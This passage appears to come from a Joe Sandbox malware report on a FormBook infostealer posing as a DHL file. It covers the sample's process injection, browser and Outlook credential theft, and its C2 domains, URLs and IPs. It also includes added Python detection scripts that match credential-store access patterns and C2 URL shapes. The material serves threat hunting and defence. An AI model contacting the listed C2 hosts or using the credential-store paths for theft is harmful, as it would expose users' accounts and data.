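            if m:
                browser = m.group("browser").split("\\")[-1].lower()
                touched[(proc, browser)].add(m.group("store").lower())
        elif ev["op"] == "key_open" and _OUTLOOK_PROFILES.match(ev["path"]):
            touched[(proc, "outlook")].add("mapi profile")

    findings = []
    for (proc, app), stores in touched.items():
        has_key = "local state" in stores
        has_blobs = bool(stores & {"login data", "cookies", "web data"})
        # Key container plus encrypted store read by the same foreign process: decryptable offline.
        severity = "high" if (has_key and has_blobs) or app == "outlook" else "medium"
        findings.append({"process": proc, "application": app, "stores": sorted(stores), "severity": severity})
    return findings


# Constructed from the rows above plus two benign events; not a sandbox export.
SAMPLE_EVENTS = [
    {"process": "netbtugc.exe", "op": "file_open", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State"},
    {"process": "netbtugc.exe", "op": "file_open", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"process": "netbtugc.exe", "op": "file_open", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies"},
    {"process": "netbtugc.exe", "op": "file_open", "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies"},
    {"process": "netbtugc.exe", "op": "file_open", "path": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"process": "netbtugc.exe", "op": "key_open", "path": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"},
    {"process": "chrome.exe", "op": "file_open", "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"process": "netbtugc.exe", "op": "file_open", "path": r"C:\Users\user\AppData\Local\Temp\scratch.tmp"},
]

if __name__ == "__main__":
    for f in find_credential_access(SAMPLE_EVENTS):
        print(f"{f['severity']:6} {f['process']} -> {f['application']}: {', '.join(f['stores'])}")
```

Two caveats when moving this to production telemetry: the sandbox only logs the opens it observed, so the Edge finding above rates "medium" merely because no Edge `Local State` read was recorded, and a stealer that calls DPAPI on the victim host instead of exporting the key never needs `Local State` at all. Treat any non-browser read of `Login Data` or `Cookies` as worth a look regardless of severity.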

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1535088491.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3799070452.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3800835213.00000000027B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3803911358.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.3807715876.0000000005620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1535865703.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3803937140.0000000004B20000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1535411168.0000000003880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C76283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\DHL 30312052024.exe | Code function: 0_2_00C76747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket

MITRE ATT&CK Matrix

The matrix was flattened during extraction and is rebuilt here column by column (one line per tactic, cells in their original top-to-bottom order). The number printed beside a technique in the original matrix is kept in parentheses; cells without a number carried none.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

Behavior Graph

Behavior Graph ID: 1570258; Sample: DHL 30312052024.exe; Startdate: 06/12/2024; Architecture: WINDOWS; Score: 100

Legend (node and edge types used in the graph): Process; Signature; Created File; DNS/IP Info; Is Dropped; Is Windows Process; Number of created Registry Values; Number of created Files; Visual Basic; Delphi; Java; .Net C# or VB.NET; C, C++ or other language; Is malicious; Internet

Start node: DNS/IP: www.joyesi.xyz; www.techchains.info; 15 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures. Attached to www.joyesi.xyz: Performs DNS queries to domains with low reputation.

Process tree (a number after a process name is the count shown next to it in the graph; see legend):
DHL 30312052024.exe 2 (started)
  Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
  -> svchost.exe (started)
     Signatures: Maps a DLL or memory area into another process
     -> FBboLdkGSWBoDSVHPM.exe (injected)
        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
        -> netbtugc.exe 13 (started)
           Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
           -> FBboLdkGSWBoDSVHPM.exe (injected)
              DNS/IP: www.rssnewscast.com 91.195.240.94 (ports 49983, 49984, 49985; SEDO-ASDE, Germany); elettrosistemista.zip 195.110.124.133 (ports 49991, 49992, 49993; REGISTER-ASIT, Italy); 5 other IPs or domains
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)
           -> firefox.exe (started)

Source | Detection | Scanner | Label | Link
DHL 30312052024.exe | 50% | ReversingLabs | Win32.Trojan.AutoitInject |
DHL 30312052024.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.rssnewscast.com/fo8o/?LzY4r=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&F6=SVfTP6Q02ra8s0 | 100% | Avira URL Cloud | malware |
http://www.3xfootball.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q== | 0% | Avira URL Cloud | safe |
https://www.empowermedeco.com/fo8o/?LzY4r=mxnR | 0% | Avira URL Cloud | safe |
http://www.elettrosistemista.zip/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A== | 100% | Avira URL Cloud | malware |
http://www.goldenjade-travel.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ== | 100% | Avira URL Cloud | malware |
http://www.empowermedeco.com/fo8o/?LzY4r=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&F6=SVfTP6Q02ra8s0 | 0% | Avira URL Cloud | safe |
http://www.magmadokum.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ== | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
elettrosistemista.zip | 195.110.124.133 | true | false | - | high
empowermedeco.com | 217.196.55.202 | true | false | - | high
www.3xfootball.com | 154.215.72.110 | true | false | - | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | - | high
www.goldenjade-travel.com | 116.50.37.244 | true | false | - | high
www.rssnewscast.com | 91.195.240.94 | true | false | - | high
www.techchains.info | 66.29.149.46 | true | false | - | high
natroredirect.natrocdn.com | 85.159.66.93 | true | false | - | high
www.magmadokum.com | unknown | unknown | false | - | high
www.donnavariedades.com | unknown | unknown | false | - | high
www.660danm.top | unknown | unknown | false | - | high
www.joyesi.xyz | unknown | unknown | false | - | high
www.liangyuen528.com | unknown | unknown | false | - | high
www.kasegitai.tokyo | unknown | unknown | false | - | high
www.empowermedeco.com | unknown | unknown | false | - | high
www.elettrosistemista.zip | unknown | unknown | false | - | high
www.antonio-vivaldi.mobi | unknown | unknown | false | - | high
Name | Malicious | Antivirus Detection | Reputation
http://www.empowermedeco.com/fo8o/ | false | - | high
http://www.rssnewscast.com/fo8o/?LzY4r=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&F6=SVfTP6Q02ra8s0 | true | Avira URL Cloud: malware | unknown
http://www.magmadokum.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjckokWPFlpLgmRSSw2BhiETUwcdg1EQ== | true | Avira URL Cloud: safe | unknown
http://www.elettrosistemista.zip/fo8o/ | false | - | high
http://www.magmadokum.com/fo8o/ | false | - | high
http://www.goldenjade-travel.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFgSElgiguhIU1cq+9C59UXHMaDdPWVQ== | true | Avira URL Cloud: malware | unknown
http://www.empowermedeco.com/fo8o/?LzY4r=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKJgdY6IPBFaQuYrbCSDzxJjPROalSnA==&F6=SVfTP6Q02ra8s0 | true | Avira URL Cloud: safe | unknown
http://www.rssnewscast.com/fo8o/ | false | - | high
http://www.3xfootball.com/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q== | true | Avira URL Cloud: safe | unknown
http://www.elettrosistemista.zip/fo8o/?F6=SVfTP6Q02ra8s0&LzY4r=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMdSNhe6OmyHrxid8+dZ6jJ+tsZTLp5A== | true | Avira URL Cloud: malware | unknown
http://www.goldenjade-travel.com/fo8o/ | false | - | high
http://www.techchains.info/fo8o/ | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.empowermedeco.com/fo8o/?LzY4r=mxnR | netbtugc.exe, 00000004.00000002.3807603495.000000000490A000.00000004.10000000.00040000.00000000.sdmp; FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.000000000471A000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.empowermedeco.com | FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3807715876.000000000569E000.00000040.80000000.00040000.00000000.sdmp | false | - | high
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | netbtugc.exe, 00000004.00000002.3812272945.0000000005AF0000.00000004.00000800.00020000.00000000.sdmp; netbtugc.exe, 00000004.00000002.3807603495.0000000003F9E000.00000004.10000000.00040000.00000000.sdmp; FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.0000000003DAE000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://www.sedo.com/services/parking.php3 | FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.0000000003DAE000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pens/popular/?grid_type=list | netbtugc.exe, 00000004.00000002.3807603495.00000000042C2000.00000004.10000000.00040000.00000000.sdmp; FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000040D2000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://codepen.io/uzcho_/pen/eYdmdXw.css | netbtugc.exe, 00000004.00000002.3807603495.00000000042C2000.00000004.10000000.00040000.00000000.sdmp; FBboLdkGSWBoDSVHPM.exe, 00000006.00000002.3805604147.00000000040D2000.00000004.00000001.00040000.00000000.sdmp | false | - | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000004.00000003.1727322738.000000000753E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | false
154.215.72.110 | www.3xfootball.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
195.110.124.133 | elettrosistemista.zip | Italy | 39729 | REGISTER-ASIT | false
116.50.37.244 | www.goldenjade-travel.com | Taiwan; Republic of China (ROC) | 18046 | DONGFONG-TWDongFongTechnologyCoLtdTW | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
66.29.149.46 | www.techchains.info | United States | 19538 | ADVANTAGECOMUS | false
217.196.55.202 | empowermedeco.com | Norway | 29300 | AS-DIRECTCONNECTNO | false
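The domain, URL and IP tables above are what a responder would turn into a hunt across proxy logs. Two things are worth matching, not one: the exact hosts and IPs listed, and the shape of the C2 request itself, since every C2 URL in the report (and in the related samples further down) keeps the path /fo8o/ and carries one long base64-like parameter plus one short token, while the parameter names change from sample to sample. The script below is an added example written for this page, not Joe Sandbox tooling: the indicator sets are copied from the report's tables (the msedge.net CDN node and natroredirect.natrocdn.com are left out as hosting infrastructure rather than campaign hosts), the log lines are constructed, and the URL-shape rule with its length threshold is an assumption generalised from the listed URLs.

```python
"""Flag proxy-log requests that match the network indicators in this report.

Added example written for this page; it is not Joe Sandbox tooling. The
domain and IP sets are copied from the report's domain/IP tables (the
msedge.net CDN node and natroredirect.natrocdn.com are left out as hosting
infrastructure rather than campaign hosts). The log lines are constructed,
and the URL-shape rule is an assumption generalised from the listed C2
URLs: constant path /fo8o/, one long base64-like value, one short value.
"""
import re
from urllib.parse import urlsplit

C2_DOMAINS = {
    "www.rssnewscast.com", "www.3xfootball.com", "elettrosistemista.zip",
    "www.elettrosistemista.zip", "www.goldenjade-travel.com",
    "www.techchains.info", "empowermedeco.com", "www.empowermedeco.com",
    "www.magmadokum.com", "www.donnavariedades.com", "www.660danm.top",
    "www.joyesi.xyz", "www.liangyuen528.com", "www.kasegitai.tokyo",
    "www.antonio-vivaldi.mobi",
}
C2_IPS = {"91.195.240.94", "154.215.72.110", "195.110.124.133",
          "116.50.37.244", "66.29.149.46", "217.196.55.202"}
C2_PATH = "/fo8o/"
# Base64 alphabet, at least 80 characters, optional padding (assumed threshold).
LONG_VALUE = re.compile(r"^[A-Za-z0-9+/]{80,}={0,2}$")

REASON_DOMAIN = "domain in report IOC list"
REASON_IP = "destination IP in report IOC list"
REASON_SHAPE = "URL shape matches campaign C2 pattern"


def looks_like_c2_query(query):
    """Exactly two parameters: one long base64-like blob, one short alnum token.

    The query is split by hand rather than with parse_qsl so that '+' inside
    the blob is not turned into a space before the regex sees it.
    """
    fields = [f.split("=", 1) for f in query.split("&") if f]
    if len(fields) != 2 or any(len(f) != 2 for f in fields):
        return False
    values = [v for _, v in fields]
    has_long = any(LONG_VALUE.match(v) for v in values)
    has_short = any(v.isalnum() and len(v) <= 20 for v in values)
    return has_long and has_short


def classify_url(url, dst_ip=None):
    """Return the list of reasons a request matches this campaign (empty if none)."""
    parts = urlsplit(url)
    reasons = []
    if (parts.hostname or "").lower() in C2_DOMAINS:
        reasons.append(REASON_DOMAIN)
    if dst_ip in C2_IPS:
        reasons.append(REASON_IP)
    if parts.path == C2_PATH and looks_like_c2_query(parts.query):
        reasons.append(REASON_SHAPE)
    return reasons


# Constructed proxy log, one request per line: "<timestamp> <client> <dst ip> <url>".
# Line 1 reuses a C2 URL from the report; the other lines are made up for the demo.
C2_SHAPED = "http://www.example.invalid/fo8o/?ab=" + "A" * 96 + "==&cd=Zx12"
LOG_LINES = [
    "2024-12-06T16:44:01Z 10.0.0.12 91.195.240.94 http://www.rssnewscast.com/fo8o/?LzY4r=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdN4JwRnXK0Z16Z0RVxT0NpaHfOGkEn8Q==&F6=SVfTP6Q02ra8s0",
    "2024-12-06T16:44:03Z 10.0.0.12 1.2.3.4 https://duckduckgo.com/chrome_newtab",
    "2024-12-06T16:45:10Z 10.0.0.17 203.0.113.5 " + C2_SHAPED,
    "2024-12-06T16:45:12Z 10.0.0.17 195.110.124.133 http://195.110.124.133/",
]


def scan_log(lines):
    """Parse each line and keep those with at least one match reason."""
    hits = []
    for line in lines:
        timestamp, client, dst_ip, url = line.split(None, 3)
        reasons = classify_url(url, dst_ip)
        if reasons:
            hits.append({"time": timestamp, "client": client, "dst": dst_ip,
                         "url": url, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(LOG_LINES):
        print(hit["time"], hit["client"], "->", hit["dst"], "|", "; ".join(hit["reasons"]))
```

The third constructed line shows why the shape rule matters: a host that is not on the indicator list but serves the same /fo8o/ request form still gets flagged, which is how the rotating decoy/C2 domains of a campaign like this are picked up after the published list goes stale. The fourth line matches on destination IP alone, as a direct-to-IP request would. Keep the length threshold and the two-parameter rule as tunables; they are derived from the URLs on this page, not from a specification of the malware.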
                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1570258
                                                                                      Start date and time:2024-12-06 17:42:13 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 10m 24s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:2
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:DHL 30312052024.exe
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.evad.winEXE@7/3@13/7
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 75%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 91%
                                                                                      • Number of executed functions: 49
                                                                                      • Number of non-executed functions: 282
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .exe
                                                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: DHL 30312052024.exe
Time | Type | Description
11:43:59 | API Interceptor | 10501787x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: 91.195.240.94
CCE 30411252024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
Certificate 11-18720.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
Certificate 11-19AIS.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
Certificate 11-21AIS.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
Certificate 1045-20-11.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
Certificate 719A1120-2024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
Certificate 64411-18.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
Certificate 11-17.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
Certificate 11-142024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
rDocument11-142024.exe | malicious | FormBook | www.rssnewscast.com/fo8o/
Match: 154.215.72.110
wOoESPII08.exe | malicious | FormBook | www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
N2sgk6jMa2.exe | malicious | FormBook | www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
Document 151-512024.exe | malicious | FormBook | www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: www.3xfootball.com
CCE 30411252024.exe | malicious | FormBook | 154.215.72.110
Certificate 11-18720.exe | malicious | FormBook | 154.215.72.110
Certificate 11-19AIS.exe | malicious | FormBook | 154.215.72.110
Certificate 11-21AIS.exe | malicious | FormBook | 154.215.72.110
Certificate 1045-20-11.exe | malicious | FormBook | 154.215.72.110
Certificate 719A1120-2024.exe | malicious | FormBook | 154.215.72.110
Certificate 20156-2024.exe | malicious | FormBook | 154.215.72.110
Certificate 11-18720.exe | malicious | FormBook | 154.215.72.110
RvJVMsNLJI.exe | malicious | FormBook | 154.215.72.110
Certificate 64411-18.exe | malicious | FormBook | 154.215.72.110
Match | Associated Sample Name / URL | Detection | Threat Name | Context
Match: POWERLINE-AS-APPOWERLINEDATACENTERHK
nshsh4.elf | malicious | Mirai | 156.251.3.5
i586.elf | malicious | Gafgyt, Mirai | 156.251.7.145
armv4l.elf | malicious | Gafgyt, Mirai | 156.244.234.130
ex86.elf | malicious | Mirai | 156.244.234.110
armv6l.elf | malicious | Gafgyt, Mirai | 156.242.206.57
mipsel.elf | malicious | Gafgyt, Mirai | 156.251.7.126
ek8LkB2Cgo.exe | malicious | FormBook | 156.251.17.224
PO 4110007694.exe | malicious | FormBook | 156.251.17.224
m68k.elf | malicious | Mirai | 156.242.206.20
xd.spc.elf | malicious | Mirai | 154.201.38.133
Match: REGISTER-ASIT
SRT68.exe | malicious | FormBook | 195.110.124.133
CCE 30411252024.exe | malicious | FormBook | 195.110.124.133
ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 195.110.124.133
Certificate 11-18720.exe | malicious | FormBook | 195.110.124.133
Certificate 11-19AIS.exe | malicious | FormBook | 195.110.124.133
DO-COSU6387686280.pdf.exe | malicious | FormBook, PureLog Stealer | 195.110.124.133
ZAMOWIEN.BAT.exe | malicious | FormBook, GuLoader | 195.110.124.133
SİPARİŞ No.112024-pdf.bat.exe | malicious | FormBook, GuLoader | 195.110.124.133
Certificate 11-21AIS.exe | malicious | FormBook | 195.110.124.133
Certificate 1045-20-11.exe | malicious | FormBook | 195.110.124.133
Match: SEDO-ASDE
CCE 30411252024.exe | malicious | FormBook | 91.195.240.94
Certificate 11-18720.exe | malicious | FormBook | 91.195.240.94
Certificate 11-19AIS.exe | malicious | FormBook | 91.195.240.94
Certificate 11-21AIS.exe | malicious | FormBook | 91.195.240.94
Certificate 1045-20-11.exe | malicious | FormBook | 91.195.240.94
Certificate 719A1120-2024.exe | malicious | FormBook | 91.195.240.94
                                                                                      Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      RvJVMsNLJI.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 64411-18.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      Certificate 11-17.exeGet hashmaliciousFormBookBrowse
                                                                                      • 91.195.240.94
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Windows\SysWOW64\netbtugc.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                      Category:dropped
                                                                                      Size (bytes):196608
                                                                                      Entropy (8bit):1.1221538113908904
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
                                                                                      MD5:C1AE02DC8BFF5DD65491BF71C0B740A7
